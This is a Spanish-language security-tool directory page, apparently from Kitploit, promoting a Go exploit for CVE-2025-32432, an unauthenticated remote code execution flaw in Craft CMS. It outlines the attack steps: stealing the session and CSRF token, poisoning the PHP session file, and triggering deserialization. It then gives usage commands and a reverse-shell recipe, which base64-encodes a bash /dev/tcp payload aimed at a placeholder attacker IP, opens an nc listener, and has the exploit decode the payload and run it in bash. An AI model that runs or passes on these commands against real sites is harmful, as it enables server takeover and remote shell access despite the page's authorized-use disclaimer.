Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32432 — Exploit de RCE sin autenticación para Craft CMS en Go. Obtiene el token de sesión/CSRF, envenena la sesión de PHP y desencadena la deserialización para ejecución de comandos o shell inversa. | Kitploit
Herramientas/GitHubGitHub/heltonpojo/cve-2025-32432
Autenticación y AutorizaciónGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubheltonpojo/cve-2025-32432

CVE-2025-32432

Exploit de RCE sin autenticación para Craft CMS en Go. Obtiene el token de sesión/CSRF, envenena la sesión de PHP y desencadena la deserialización para ejecución de comandos o shell inversa.

Ver Repositorio
hace 21 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-32432 — Craft CMS Pre-Auth RCE

Exploit para ejecución remota de código sin autenticación en Craft CMS, escrito en Go.
Inspirado en el trabajo original de c0gnit00.

Cómo funciona

  1. Obtiene la sesión PHP y el token CSRF mediante GET /admin/login
  2. Envenena el archivo de sesión PHP inyectando código PHP en la query string
  3. Dispara la deserialización mediante assets/generate-transform para incluir y ejecutar el archivo envenenado

Uso

root@kitploit:~
go run main.go -u <url> -c <comando> 
FlagDescripciónObligatorio
-uURL objetivo (ej: http://target.com)Sí
-cComando a ejecutar (ej: id, whoami)Sí

Ejemplo

root@kitploit:~
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami

Reverse Shell

1. Genera el payload en base64 con tu IP y puerto:

root@kitploit:~
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64

2. Abre el listener:

root@kitploit:~
nc -lvnp 4444

3. Ejecuta el exploit con el payload:

root@kitploit:~
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"

Sustituye el valor en base64 por el generado en el paso 1 con tu IP real.

Advertencia

Para uso exclusivo en entornos autorizados y pruebas de seguridad controladas.

Descargar herramienta